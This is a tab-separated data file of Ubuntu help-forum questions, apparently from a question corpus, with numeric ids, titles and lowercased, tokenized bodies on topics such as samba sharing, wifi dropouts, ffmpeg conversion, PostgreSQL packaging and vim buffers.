12138	what calls postgresql 's initdb on package installation ?	i 'm trying to a build a custom package of postgresql with some configuration tweaks suitable for our application . part of that configuration involves a pg_hba.conf using `` trust '' instead of the defaults . i can see when i install a setup script is triggered and the postgresql 'initdb ' command is run . this copies the sample config files and applies some transformations to it ( keyword replacement ) and copies into /etc . however even if i remove the keywords from the pg_hba.conf.sample file and hard code the values i want they automagically get reverted to the defaults . i 've tried to follow the post install scripts but all i can see is a call to configure_version which is n't anywhere in the postgresql source code . so what is the call-chain from post installation scripts to the initdb program being called ? and how can i tweak the parameters of the initdb call for my preferred form of authentication ?
12139	does ubuntu support usb 3.0 ?	i have a western digital my book 3.0 - 1 tb usb 3.0 desktop external hard drive , and i wanted to know if it would work on ubuntu 10.10 maverick meerkat .
12154	getting the word count of a pdf document in evince	is there any way i can get the word count of a pdf document that i 'm viewing in evince , ubuntu 's default pdf viewer ? i 'm able to convert the documents to text files and get the word count from the terminal , but i 'd quite like to be able to quickly get at them without having to use the terminal . is there any plugin that can do this , or is it already built in and i 'm just missing it ? p.s . i 'd prefer not to change my viewer as evince is the default pdf viewer in ubuntu , and i 'd quite like to do as much as possible using the default applications since a lot of them , evince included , are really nice .
12160	how can i relabel my flash drive ?	currently it looks like :
12161	xorg.conf for ati radeon x1300 and ubuntu 9.10	does anyone has a `` good '' xorg.conf example for the radeon x1300 on ubuntu 9.10 ? mine works a little slow ... thanks
12162	change resolution when enabling/disabling external monitor	i use my laptop with a second display . sometimes i should take my laptop with me , but i ca n't take my second display with me . how can i setup my ubuntu 10.04 so that it changes the resolution automatically when i disable the second display ? my normal resolution ( with the second display ) is 2646*800 . my resolution without the second display ( laptop resolution ) 1280*800 . what i want is : when i disable second display , my resolution automatically ( or by running some script ) changes to 1280*800 when i connect second display resolution change to 2646*800 .
12172	split a large file into smaller files and then integrate them to get the original file	how do i split a 7gb ( movie ) file into smaller files of ( say ) 1gb , and then ( in another ubuntu computer ) integrate them to get the original file ( using just bash commands ) ?
12173	nfs mounted directory owner problem	i am able to mount an nfs directory as a regular user ( which does n't have sudo rights ) because a suitable entry ( i.e . with the user option ) is defined in /etc/fstab file . but , when i mount it , i am not the owner of it ! the owner is the default superuser of the system . so i do n't have write permissions in the mounted directory . how can i make the directory mine ?
12174	what differences are there between the various version of emacs available ?	ubuntu ( 10.10 ) offers emacs21,22,23 and emacs-snapshot . what are the differences between them and which one does the emacs package install by default ? also , i presume emacs-snapshot-gtk is the most up to date one . i would like to use this because it seems to pay attention to my .xdefaults settings , which emacs does n't . what disadvantages might this cause ? i use emacs for latex , orgmode and ess/r programming .
12177	lose internet after my computer goes to sleep	i have an hp tx2 laptop and am using ubuntu 10.04 with the 2.6.34 kernel . when i close the lid of my computer , put it to sleep , and then open it later , i 've lost the ability to connect to the internet . there 's an ethernet cable plugged in by the network manager can no longer find it . i have no choice but to reboot . any suggestions ? thanks .
12180	logging out other users from the command line	sometimes when there are too many users logged in it can cause my computer to become very slow and laggy due to low amount of available ram . i would like to be able to quickly log out the other users from the command line instead of manually switching into each user and logging them out . is this possible ?
12182	how can i convert an ogv file to mp4 ?	i created a screencast using recordmydesktop which produed a .ogv file . i believe this is an ogg file encoded using the theora codec . i 'm wondering , how can i convert this to mpeg4/h.264 ? i 've tried to use ffmpeg in a naive way , as follows : ffmpeg -i demo.ogv -f mp4 demo.mp4 however , this produces an evil blob of dark greens and grays when trying to play it again in mplayer . i then tried to get more sophisticated , using the command-line flags specified here : converting a video file in arbitrary file format into mpeg4/h.264 ? ffmpeg -i demo.ogv -s 352x288 -vcodec libx264 -vpre default -acodec libmp3lame -ab 192k -ac 2 -ar 44100 -f mp4 demo.mp4 but , the result was the same . if anyone has any insight into what might be the best way to accomplish this task , i 'd appreciate it if you could let me know .
12187	how can i fully use the chroot i create with debootstrap on a local machine ?	i 'm running on a ubuntu 10.04 , and installed an 8.04 version in a directory /stuff/hardy sudo debootstrap -- variant buildd -- arch i386 hardy /stuff/hardy http : //archive.ubuntu.com/ubuntu what i want to do is to get a working environment isolated from my linux machine ( without installing into another partition ) . my problem is , that when i chroot into it ( sudo chroot /stuff/hardy ) i notice that i have nothing in /proc or no network configuration . also , if i try to go back to my home directory ( inside hardy , not 10.4 ) , hardy # cd i get a /home/myuser no such file or directory is there an ( hopefully easy ) way to get an ubuntu install using debootstrap with no a lot of extra work ? thanks in advance
12196	how to stop typing break from interrupting vlc ?	when i watch a dvd in vlc , the typing break will kick in even though i have n't touched the keyboard or mouse for over half an hour . this is a bit annoying ... does anyone know how to stop this happening ?
12197	lenovo z360 sometimes does n't suspend , freezing up completely	i have a new lenovo z360 laptop . about 1 in 5 times , instead of suspending when i close the laptop lid , the screen goes blank and the machine freezes and stays on , with the fan running . i have to hard-boot at that point , which sucks . i have n't been able to narrow down the scenario , exactly . this laptop does n't have the nvidia card , just the intel video . i 've turned off desktop effects which did n't help . it has happened while plugged in and not plugged in . update : upgraded to ubuntu 11.10 and this issue still happens . debug notes ( per https : //wiki.ubuntu.com/debuggingkernelsuspendhibernateresume ) : there are no flashing caps lock lights or similar . setting the boot param no_console_suspend and then switching to vt1 and running the commands setfont /usr/share/consolefonts/uni1-vga8.psf.gz and sudo pm-suspend will trigger suspend with this issue , but there is no text output beyond the last command . the computer also freezes on shutdown ( without actually shutting down ) right after printing power down on the console . [ 10123.4321 ] power down .
12198	strange behaviour with gimp and wacom	when i enable the wacom tablet in the gimp extended input devices ( setting it to 'screen ' ) , to use the pressure sensitivity , it starts to behave strangely . i can not pick guides from the rulers and the selection tool ( the marching ants ) become invisible . has anyone had the same problem ? is there any workaround ?
12199	why does sftp timeout during a download ?	my server keeps timing out when i attempt to download a handful of files at once . i 'm running ubuntu 10.04 lts sshd_config contains the following tweaks : subsystem sftp internal-sftp match group www chrootdirectory % h x11forwarding no allowtcpforwarding no forcecommand internal-sftp and fstab contains the following tweaks : /srv/www/domain.com /home/chris/domain.com none bind after attempting to download the files the user will be disconnected . i 'm not even sure where to begin debugging this , so any help would be greatly appreciated . thanks .
12204	apache alias not working correctly	i have added these lines in my 000-default virtual host file : alias /antoniocs/project `` /home/antoniocs/www/project '' < directory `` /home/antoniocs/www/project '' > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > /home/antoniocs/www/project contains a drupal website if i go to : localhost/antoniocs/project this works out fine . i see everything perfectly . but when i try to click on a link that takes me , for example , to : localhost/antoniocs/project/category i get this error : not found the requested url /home/antoniocs/www/project/index.php was not found on this server . is this not processing the .htaccess that is in the project folder ? what am i doing wrong ? ? ? note : i also find it strange that it 's giving me a file path and not an url path running on apache 2.2.16 ( with mod rewrite ) ubuntu 10.10 php 5.3.3-1ubuntu9.1 extra note : for those that do n't know drupals htaccess , it redirects everything to index.php ? q= $ 1 rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewritecond % { request_uri } ! =/favicon.ico rewriterule ^ ( . * ) $ index.php ? q= $ 1 [ l , qsa ]
12206	how do i start the vnc server ?	how can start the vnc server to make my desktop accessible ?
12208	can i take a screenshot of a virtual console ?	is there a way for me to take a screenshot in a virtual console ?
12209	cheese with vaapi	i am using a dell inspiron mini 10 with gma500 video drivers . gma500 fixes resolution issues and enables video acceleration . the only problem with the gma500 drivers i am having is that i can not find a fix for the webcam program called cheese , and i ca n't find a way to enable the vaapi ( video acceleration api ) backend . videos do n't work with the gma500 ( without vaapi ) and i can not properly use cheese . if anyone can help me out with this i will be grateful because google is n't helping me much with this problem .
12213	upgraded to 10.04 lts and can not startup	i 've been running 9.10 on an old toshiba satellite laptop for a few months and recently went to upgrade it to 10.04 lts , using the update manager . after the update , the computer will not boot . there is an ubuntu splash screen and then nothing . are there any good things to do to troubleshoot ? i 've reinstalled 9.10 and can make adjustments before upgrading this time if it will help .
12215	making diff output more readable	i 'm looking for a tool that will take diff / debdiff output ( and more specifically , the output of this script ) and display the result of the comparison in a highly readable , graphical way . any pointers would be appreciated . ideally , it would be the gtk+ , foss equivalent of mdr . meld , diffuse and similar software are not fit for this purpose , since they 're intended to work standalone , and do n't take input from stdin .
12217	debian post installation triggers often make my system unusable ! is there something i can do ?	mainly it 's the menu and monodoc-base triggers that cause the problem . recently monodoc base has become a major pain . it keeps saying there are a bunch of errors , and uses up 100+ cpu % and makes it impossible to do a thing . i 've had to force it to stop so many times now . i do n't want to lose monodevelop , but will a reinstall work to stop the hell ? i got kinda mad and went ahead and did it . gon na see how it goes , but so far , it 's improved .
12218	best place to install apps	i am completely new to ubuntu and i must say askubuntu and you folks are of great help . so now when i have started installing and playing with apps , my question is what is the best place to install/download apps ? like in windows it usually goes under your c : drive and then you manage it under program files . linux structure is quite different with a different folder hierarchy . i have attached the directory structure of my machine as well . i thought this question would help lot of beginners .
12220	tab completion comp_words bad array subscript	i have upgraded my ubuntu to 10.04 and i am facing this problem of comp_words bad array subscript when i press tab for certain completion . i thought , it is a bug with bash-completion package and i purged it . but even after that , i still face this . if it is a bug with bash package , how i can resolve it ? https : //bugs.launchpad.net/ubuntu/+source/bash-completion/+bug/366446 it is difficult for a developer to live with this bug in the system .
12222	is this type of clash common ? cream / compiz , or is it a bug ?	i 've got an odd situation happening with a `` cream '' dialog ... can anyone else duplicate this behaviour , or is it just my system ? ... or is it a bug ? my settings lucid 10.04 compiz filter : `` scale '' -- `` initiate window picker '' . binding : initiate_edge = top left cream : run it maximized , or at least with its top edge touching the lower edge of the panel.. ... in a scrap file , type `` yyuryyubicuryy4me . '' ... exit cream ( alt+f4 , mouse , menu , it does n't matter which ) ... in the yes/no/cancel dialog , click `` no '' ( or any button ) the problem : any action on the dialog causes compiz to display its `` initiate window picker '' window ! the problem setting ( ? ) when i change the initiate_edge setting to none , the behaviour is normal . i do n't use cream much , but i do n't remember it doing this when i first tried it a few weeks ago ( but maybe it did , and i did n't pay attention to it ) . is this a cream bug ?
12223	best graphics card to use with 10.10	i am a gamer running on ubuntu 10.10 with a g92 [ geforce 9800 gtx+ ] graphics card using the binary drivers . it runs alright , but even on simple games like teeworlds and minecraft i find they can max out one of my 3 ghz cores , making the game occasionally choppy . is an ati card likely to be better ? is there anything else people can recommended to improve performance ?
12227	drapes crashed after adding too many wallpapers	the wallpapers managing tool , drapes , crashed after i add too many wallpapers.drapes ca n't be started . i want to modify or clean the file recording the path of added wallpapers , but i ca n't find the configure file of drapes using locate drapes . how to repair this problem . how to uninstall it with deleting the configure file or environment of drapes . be thankful for any advice .
12228	multiplot on octave	i have recently installed octave from synaptic on my ubuntu box . to my surprise , the multiplot methods ( multiplot , mplot , etc . ) are not present ( in either octave-3.0 nor octave-3.2 packages ) . which package should i install to have these ? i 've found packages such as octave-plplot have these functions , but for plplot or other libraries ... i just want the gnuplot vanilla version ... thanks in advance !
12237	sound problems with non-kde applications on kubuntu	i m a newbie to linux and have installed kubuntu 10.04 lts . there are problems regarding the web browsers ( google-chrome and mozilla ) and also in vlc player ... no sound could be heard . but the dragon player works well . what could be the problem and possible solutions for it ?
12238	why is system load average around 9 on login ?	i check my start up applications , disable them , but login take a long time and system load is very high ( about 9 ) . this only happens on default user account , and i have this problem since 10.10 upgrading . what should be wrong ? : -/ edit : i made an sh file and set it to run at startup . i pasted them in pastebin.com , dmesg output , top output
12241	is there any information on when the ubuntu one music store will add more countries ?	according to the ubuntu one music store help page , the following stores are currently available : uk - purchase songs in eur . us - purchase songs in usd . germany - purchase songs in eur . eu - purchase songs in eur . the countries in this region do not match the actual definition of the european union . customers in austria , belgium , czech republic , denmark , finland , estonia , france , greece , hungary , iceland , ireland , italy , latvia , liechtenstein , lithuania , luxembourg , malta , netherlands , norway , poland , portugal , slovakia , slovenia , spain , sweden , and switzerland will use this store . world - purchase songs in eur . customers in countries not covered by the rest of the regional stores will use this store . however , that does n't include my country ... and there 's a note further down : more country-specific regional stores will be added after the launch of ubuntu 10.04 lts . is there any information on what those are and when they 're getting added ?
12249	ubuntu backup solution to backup a networked mounted drive to the local disk , and with a gui	i 'm running an internal network lamp server on ubuntu 10.10 . i have another ubuntu running on an older ppc g5 with a 640gb drive in it . i 'd like to run some software on that g5 that does some snapshot and archiving over the network of the data running on my lamp server . ideally i 'd like something that has a simple admin gui that allows me to browse and restore files . what would be a good piece of software ? something like the mac os x time one thanks jason
12250	what is causing gnome-panel to crash and respawn constantly ?	hey everyone for some reason my gnome-panel keeps crashing and restarting and keeps shifting windows that i have open up and down as they reaccomodate for the crashing/respwaning gnome-panel . prior to this i had the indicator global menu applet enabled and i opened a java program ( freemind ) and then this problem started happening . if i go into the terminal and type sudo gnome-panel -- replace a new top and bottom panel gets created but in the window list i can still see a `` starting panel '' program opening and closing constantly . does anyone know how i cold fix this ?
12254	no access to samba shares	i have three shared folders in my local home directory- that is to say , on my ubuntu desktop 's /home/me/ . all were set up using `` sharing options '' in nautilus ' right-click menu . the standard `` music '' and `` videos '' folders are configured identically : the `` guest access '' box is checked , but the `` allow others to create and delete '' is not . the third folder , called `` shared '' , is configured to not allow guest access but to allow others to modify files . i have not altered /etc/samba/smb.conf by hand , i have only used sharing options to create and modify these so-called `` shares '' . my roommates have two windows 7 computers and one ubuntu netbook remix netbook . i have the aforementioned desktop machine and laptop running 10.04 . none of these machines can access any of the shares . attempts to access the guest shares result in the message \\machine\directory is not accessible . the network name could not be found . this is the error message generated by a vm running windows 2000 . the other windows machines generate a similar error . the ubuntu laptop gives the error unable to mount location : failed to mount windows share . hurrah , once again , for informative error messages . that really helps a lot . when attempting to browse the folder called `` shared '' from the laptop , i 'm confronted with a password dialog . this behavior is the same will all machines i 've tried in the situation . on entering my username and password for the account to which the shares belong , the password dialog briefly disappears and is replaced with an identical dialog . no error message , useful or not , appears . when attempting to browse this folder with the vm , the outcome is the same except that the password dialog helpfully states `` incorrect username or password '' . my assumption is that the username and password in question is that of the user which owns the shares . i have tried all other username and password combinations available in this context and the outcome is the same . i would like to be able to share files . sharing them with windows machines is a nice feature , or would be if it was available . really i consider sharing files between two machines with the same version of the same operating system kind of a minimum condition for network usability . samba last functioned reliably for me more than ten years ago . i have attempted to use it on and off since then with only intermittent success . oh , and `` personal file sharing '' from the preferences menu does not result in an entry in places → network → my-server . in fact , the old entry `` my-server '' goes away and is replaced by `` koanhead 's public files on my-server '' , which when i attempt to open it from the laptop gives a `` dbus.error.noreply : message did not receive a reply . '' i know i come here and gripe about ubuntu a lot , but on the other hand i spend literally hours every day trying to fix things in ubuntu . it 's a good system which aspires to greatness , which is why things like this either need to work ; or be adequately documented . ideally both would be the case . anyway , rant over . hopefully someone will have some insight on this issue . thanks all who bother to read this wall o'text for your time .
12257	what went wrong with my upgrade to maverick 10.10 ?	since i have upgraded my working lucid pc to maverick i am unable to log in as a normal user . i can only login as root . if i log in as a normal user the log in screen disappears and reappears with the sound effects . if i type the wrong password then i get authorization failure and back to the log in screen as normal . even then as root if i try to run some programs it will return to the login screen . the display seems to be fine - it is the onboard s3 - no special drivers . please help - i am scared to upgrade my other machines ! !
12265	why does wifi drop out constantly ?	with any version of ubuntu i try it seems that i have an issue with wifi . try as i might , i can not make the wifi stay connected . i have since installed iwscanner and i can see that my wifi network is on a different channel to the others in range . i can also see a signal strength of about -60 consistently except every minute or so ( sometimes as often as 10seconds apart ) it drops to -100 or essentially nothing . if i boot the same machine into windows 7 it seems to work okay , other laptops seem to work okay . it is a linksys wusb54gc v.3 which seems according to the community docs to be supported . i am not really that far away from the router and besides my mobile phone connects to the wifi network fine from the same distance . the router is getting old so i had considered maybe it was a problem with the router ( draytek ) but then i should have issues with the other machines . network is not broadcasting its ssid and is using wpa2 edit also the dropouts to -100 signal are much more frequent when i try to connect to the network using network manager . every ~2 seconds consistently .
12269	problem with `` texas instruments acx 100 22mbps wireless interface ''	i just did fresh install from ubuntu 10.10 desktop cd and i ca n't use my wiresless card . sylwia @ mutalisk : ~ $ lspci ( ... ) 00:0b.0 network controller : texas instruments acx 100 22mbps wireless interface ( ... ) when i try modprobe acx i get fatal : module acx not found . output of : lspci -nnvv | grep network\ controller : 00:0b.0 network controller [ 0280 ] : texas instruments acx 100 22mbps wireless interface [ 104c:8400 ]
12271	time-out while trying to download public keys	almost every time i try to add a new software source , i get an error : james @ james-ga-890gpa-ud3h : ~ $ sudo add-apt-repository ppa : flozz/flozz executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 879e176037576c38da61862bd2bf771175034bec gpg : requesting key 75034bec from hkp server keyserver.ubuntu.com ? : keyserver.ubuntu.com : connection timed out gpgkeys : http fetch error 7 : could n't connect : connection timed out gpg : no valid openpgp data found . gpg : total number processed : 0 james @ james-ga-890gpa-ud3h : ~ $ am i doing something wrong ? i 'm using cut & paste to avoid typos .
12279	why are almost all packages marked as manually installed ?	i just installed maverick and was surprised that almost all packages are marked as manually installed ( linux-headers and wireless-crda are n't ) . does n't that defeat the purpose of the differentiation between automatically and manually installed packages ?
12281	will the id software game rage be placed in the software centre shop ?	rage will come in 2011 and it would be nice to have it in the ubuntu software centre shop ! it is based on idtech 5 and uses opengl . there is just a need of coorparating with id software .
12282	installing from software center does not create menu entries	i notice that sometimes after installing something from the software center , the software gets added to a menu and i get a nice message telling me how to launch it ... other times i get none of these and i have no idea how to launch it ... in those cases i usually try alt-f2 and try to guess the name of the executable . is there any way to improve this situation ? what 's the best way to `` finish the job '' of installing software that leaves me in this situation ( i.e . add it to a menu ) ?
12284	why ca n't i create a partition table on my usb flash drive using gparted ?	i have a blank usb flash drive i want to put a new filesystem on . if i try adding a new partition it complains `` no partition table found on device /dev/sdc '' . creating a msdos partition table seems to work correctly , except that when i go to add a new partition it complains with the same error . what am i missing ?
12286	delete empty `` lost+found '' folder automatically if it 's empty	every certain amount of time , ubuntu checks my filesystems and it creates several empty `` lost+found '' folders . can i disable this feature ? is there any way that ubuntu deletes automatically these folders if they are empty ? is there any manner to hide this folder on nfs ?
12289	change docky icons for wine applications ?	is there a way of customizing the icons shown in docky for wine applications ( including starter and running applications ) ? most windows programs have icons with too low resolution by default , so i 'd like to assign better icons to them . thanks in advance ! ysn
12294	how to produce an invoice ?	what 's the easiest way to produce an invoice ? it seems to be part of larger apps , but what if i just want the invoice capability without a lot of overhead ?
12300	need an applet to report web sites unavailability	is there a gnome applet that will let me configure a list of urls to be verified and report when some is unavailable ? preferably using notifiations . the validation must use http get or head .
12302	switching buffers in vim	i 've recently switched from emacs to vim , so this may just be me completely misunderstanding how vim works . i 've opened a file in vim and make some changes but do n't save them . i then use : e otherfile to open a second file , and make some changes to that . again , without saving the changes , i 'd like to go back to the first buffer . i 'm using : bn for that , but when i do i get e37 : no write since last change ... . if i do : bn ! then i can change back to the first buffer . from the first buffer i can change back to the second buffer with a straight : bn , but i have to do : bn ! to go from the second buffer to the first every time . i 've got set bufhidden=hide in my vimrc , but if i run : set bufhidden ? in vim i get bufhidden= . is that the problem maybe ? edit : i 've narrowed the problem down a bit . in the first file , : set bufhidden ? returns bufhidden=hide , but in the second file , it returns bufhidden= . what 's up with that ? am i missing something fundamental about vim buffers here ? edit2 : ok , it seems like set bufhidden=hide only applies to the first buffer opened . it needs to be explicitly called in subsequent buffers . i must be completely missing the point here , because this does n't seem useful .
12307	how do i re-activate ( wake ? ) the monitors from the command line	my machine is a little weird on the graphics/monitors . i 'll go into that in a bit , but i 'm specifically looking for how to do the following : when the monitors are standing by , but the system is running , usually pressing a key on the keyboard will wake them up . is there a way to accomplish the same kind of waking up from the command line , when remotely connected over the network ? the specifics of what this solves for me is that when i reboot my machine , the nvidia powermizer settings get reset to adaptive . because this is a managed desktop i can not edit /etc/ files to change this . i do have something that sets it to maximum performance once i log it . this eliminates the flicker i get on my second display port monitor , and it allows the screens to wake up after being timed out to stand by . so , if i reboot and do not log in , the screens might sleep , and then not wake up . however the machine is still running fine . if you 're curious the driver is nvidia 195.36.24 , the card is a quatro fx 580 , the monitors are two dell u2410 attached via display port ( dfp-3 & 4 ) ; the vbios is 62.94.96.00.05 thanks . ps would create tags sleep and powermizer update as much as the answer is correct for my question , it seems that the state of non-waking monitors can not be gotten out of this way .
12308	anyway to get a palm pilot ( tungsten e2 ) to sync with evolution or thunderbird ?	any thoughts or suggestions ?
12309	download just .html files over ftp	okay so i have a website maintenance job to do today . client has a ftp server with the website on . fairly standard ( albeit outdated ) stuff . i need to do a find-and-replace over most of the html files to change the navigation . to do that effectively , i 'd need to do that locally . the ftp server is full of rubbish . the guy has been using it to exchange files with his clients . i want to get a copy of all the relevant files but at the same time , i do n't want to waste time downloading dozens gigabytes of stuff i 'll never need . the ftp is mounted in ~/.gvfs at the moment . is there something quick and easy i can do to copy all the .html files out , keeping the directory structure so that when i 'm done working on the files , i can just copy them back using merge/replace ?
12312	how can i see the size of the squid cache ?	anyone know how to see the space on squid ? i mean the cache space on the squid that is being used , like the available space and used space of the cache itself , thanks !
12314	why are downloads from canonical partners repository so slow ?	if i need sun java , adobe flash plugin or anything else that comes from canonical partners the package downloads are painfully slow even small sized packages like the flash plugin , to speed things up i have to go here : http : //archive.canonical.com/ubuntu/pool/partner/ to find what i want , download the packages with a download manager ( which is usually about 20 times faster than the package manager ) and then place them in my /var/cache/apt/archives folder i run the package manager afterwards , as long as the right versions of the packages i ask to install are detected in the /var/cache/apt/archives folder they will be installed immediately . i would like to stop doing this , so i am wondering if anyone else has this problem , what could be the cause and if there is a fix . i am located in the western caribbean region . i think it would be helpful to note that all other packages coming from the repository i have selected with synaptic download at acceptable speeds .
12316	customize gnome-do 's default action order	i 'm using gnome-do with the `` files and folders v2.5 '' plugin . i set it to read my .scripts folder , so that i might run my personal scripts from gnome-do . the only problem is that gnome-do 's standard action for shell scripts is to open them instead of running them . that forces me to tab and scroll-down every time . how can i change gnome-do 's standard action ? an example for clarity : i have a foo.sh executable file inside my .scripts folder . when i type foo inside gnome-do , it correctly selects the file and offers the open action . i then have to tab , press down , and hit enter to select the run action instead . i would the run action to be first on the list . alternatively , a more appropriate way to integrate gnome-do with personal scripts would be fine as well .
12322	will ubuntu server properly manage the power settings on a netbook ?	i 'm planning to install ubuntu server on a netbook to minimize power consumption . are there any special considerations i should make for this kind of setup ? will ubuntu server properly manage the laptop 's power settings and cpu scaling by default , or will i need to make changes to the configuration or install packages that would normally only be found in ubuntu desktop ?
12323	is it safe to install compiz experimental plugins 0.1.1 on maverick ?	does anyone have these plugins installed ? sorry , but i 'm worried , because my past attempts to update compiz have failed , and when i try to install these plugins they ask to me to update these files : compiz-dev compiz-fusion-bcop debhelper html2text intltool-debian libcairo-gobject2 libcairo2-dev libdecoration0-dev libdrm-dev libexpat1-dev libfontconfig1-dev libfreetype6-dev libgl1-mesa-dev libglu1-mesa-dev libice-dev libkms1 libmail-sendmail-perl libpango1.0-dev libpixman-1-dev libpng12-dev libsm-dev libstartup-notification0-dev libsys-hostname-long-perl libx11-xcb-dev libxcb-render0-dev libxcb-shm0-dev libxcomposite-dev libxcursor-dev libxdamage-dev libxext-dev libxfixes-dev libxft-dev libxinerama-dev libxml2-dev libxrandr-dev libxrender-dev libxslt1-dev libxss-dev mesa-common-dev po-debconf x11proto-composite-dev x11proto-damage-dev x11proto-fixes-dev x11proto-randr-dev x11proto-render-dev x11proto-scrnsaver-dev x11proto-xext-dev x11proto-xinerama-dev please answer my question , and i 'll be very grateful ! these plugins are here
12324	what cell phones ( feature phones , not smart phones ) work well with ubuntu ?	i 'm in the market for a new cell phone soon , and i 'd like for it to work well with ubuntu . i do n't use my phone for much -- just calls , texts , and the occasional photo . it would be nice if it could also do these things ( highest priority first ) : be cheap sync ( or at least manually transfer ) contact data with ubuntu sync ( or at least manually transfer ) photos with ubuntu connect to ubuntu via something like a mini-usb cable , rather than requiring a vendor-specific cable sync ( or at least manually transfer ) ringtones and such with ubuntu ( i doubt i 'll ever use this , which is why it is last ) what phones best meet these criteria ? it it matters , i am on verizon in the usa .
12325	problem when booting , like old tv but when log in back to normal	i have axioo laptop using sis mirage 3 ( sis m672+sis968 chipset ) when i turn on my laptop , bios no problem , when booting ubuntu , problem with display like old tv ( broken ) but when log in back to normal ... . and my next problem my resolution ca n't 1280x800 any solution for my problem ?
12330	windows xp and 10.10 maverick sharing ?	my brother has windows xp on his laptop and i have ubuntu 10.10 installed and samba is also installed on mine and when i connect my laptop with a desktop running ubuntu , i am able to see and access the shared files . so sharing works fine between two ubuntu computers . my brother 's and my laptops are connected through the cross cable for me to access the shared folder on my ubuntu laptop from his xp shared folder . i connect both laptops and then ping , ping gives perfect reply and i can see his computer name in the places > network when i try to open his shared folder from there i get and option to enter the password i enter the password but the password prompt pops up again . i tried to enter his password and mine password also but each time i enter the password nothing happens but the password prompt pops again without any error report .
12331	decompress an ntfs windows file system using ubuntu	my friend ( on windows xp ) recently compressed his entire c : / drive and consequently , his laptop wo n't boot , he gets `` bootmgr is compressed press ctrl+alt+del to restart '' . this happens every time ! i can boot ubuntu from the usb so i was wondering if it was possible to fix this issue ? thanks in advance , ell . edit : his laptop does not have a cd drive
12336	easter eggs in ubuntu	i just found out about the free the fish easter egg available in ubuntu : press alt + f2 enter this : free the fish are there any more easter eggs available in ubuntu ? what are they ? bonus question : how do i get rid of that fish ? : - )
12339	copying files to truecrypt file container hangs	i have a dual boot installation with windows 7 ultimate ( 32-bits , ntfs file sytem ) and ubuntu 10.10 ( 32-bits , ext4 file system ) . i have installed the version 7.0a of truecrypt in both operating systems . located in the windows 7 hdd i have a 150 gb encrypted file container . it is a standard and dynamic file container , which means it 's not hidden and uses a sparse file . this file was created using the windows version of the truecrypt program . when i logon in windows the container is mounted as the drive e : and everything works fine ! in ubuntu the windows 's ntfs file system is automaticaly mounted after i logon . i 've configured that using the ntfs-config package . in my ~/.profile i have this line to mount the truecrypt 's file container : truecrypt /media/7edebcfadebcabb1/users/wagner/hd/hd.tc /media/truecrypt1 the file container is mounted after the logon without any problem . i can access it , copy files to/from it , etc . but when i try do copy relatively large amounts of data ( > ~50 mb ) to it via nautilus or cp -r , it starts the copy , copies some data until certain point and then it just hangs ! the progress bar does not move anymore and nothing happens . there is no error , it just hangs and that 's it . i have to kill the process myself . this problem does not happen in windows : i can copy very large amounts of data to the container and it works great . but in ubuntu the problem always happens ! i mean , whenever i try to copy a bunch of files together the copy process hangs . does anyone ever faced this problem ? can anyone help ? thanks !
12349	view threads/conversations in evolution just like gmail can	i want to view threaded email conversations in evolution . is there a menu option for this ? by threaded conversations i mean something like what google 's gmail does .
12353	how to connect online with dial up connection & modem using live cd	i want to browse internet using the ubuntu live cd . i have a dial up connection ( using modem ) . how do i do it .
12355	how do i get my broadcom bcm4313 working correctly ?	i 've installed ubuntu on a asus 1015 netbook . everything worked out of the box except for the wireless adapter , which i had to install with the additional drivers application . it apparently installed fine and connects to our wireless network , but it only works at a `` funny '' speed range that goes from 367bytes to a peak of 3kb in its best moments . i know for sure the problem is neither the network nor the hardware . network speeds are normal under windows on this laptop and in other computers with ubuntu aswell . lspci says the card is a bcm4313 model , but the addittional drivers manager says these packecege contains broadcom 802.11 linux sta wireless driverfor use with broadcom 's bcm4311- , bcm4312- , bcm4321- , and bcm4322 based hardware seems like it installed the wrong driver ... is there anything i can do ? i 'm not concerned about compiling the driver or stuff like that , but i 'm not sure on where to start ... any help or guidance will be very , very appreciated .
12358	how do i setup a server remotely ?	i can run ( and have run ) the install fine with a monitor attached the machine , but what i wish to do is setup ubuntu server remotely ( within my home network ) . i have a usb drive pre-loaded and ready to go . where do i go from here ?
12360	where can i find a repository for older unsupported releases ?	i remember i saw a apt mirror somewhere containing older distributions but i can not find it anymore . does anybody know where to find it ?
12364	how to create a debian package with disjoint dependencies ?	i have written an application , and i 'm now interested in creating a debian package and setting up a ppa . the application is written primarily in xslt , and includes a very thin front-end that can be written in any language that can access an xslt processor . i currently have front-ends written in javascript ( able to run in the browser client , and from the command-line under rhino ) and python . i 'd also like to write a front-end entirely in bash , and simply use one of the command-line xslt processors available in apt . there are several available via apt , including xsltproc , xalan , and 4suite 's xslt processor . i 'd like to make the bash front-end flexible so that it is able to use any of these command-line clients , and will simply use whichever is available . my question is , how best can i express in terms of debian 's package dependency system the relationship between my package and these three other packages , which is a logical disjunction ( or relationship ) . my package relies on xsltproc or 4suite or xalan . ideally , when my package is installed , the user should be prompted to choose any of these three package to install as a dependency ; and if one of these packages is already installed on the system when my package is installed , then no additional dependencies should be installed . is such a thing possible with debian packages ? i 'd appreciate any guidance into this anyone can offer . thanks .
12367	can one choose a specific repository for the ubuntu setup process to use when installing from the live cd ?	i know a very fast repository i often use to install packages , i would dearly like to use this when i am setting up ubuntu , the mirror used by setup when the region is choosen is usually very slow , this results in apt configuration taking a long time . i usually have to remove network connectivity from the machine i am setting up and the setup process will quickly complete . i then use synaptic to change to the fast repository before installing all those large packages i need , it would be much smoother though , if i did not have to do this and could feed the setup process repository information before hand . i am wondering if i use the synaptic package manager in the live session and select a repository if the selected repository will be the one used during setup or will the setup process use the one it thinks is best usually a local mirror ?
12368	ipython like command history for shell	for those of you who do n't do python programming on ubuntu , ipython is a python shell on steroids , but it has this amazing feature that it not only autcompletes based on known names ( i.e . the same way bash does when you press tab ) , but if you start typing a command and press up , it does n't scroll through the entire history ( like bash ) but only through the recent commands that started with the same string of leters . so if you did some long command like scp -r -p 8000 -l user server.com : ~/dir/to/copy ./ followed by several other commands . if you started typing scp and pressed up , bash would display the command shown before instead of just scrolling through the entire history . is there an extension like this for bash ? or is there any shell that offers this kind of feature ?
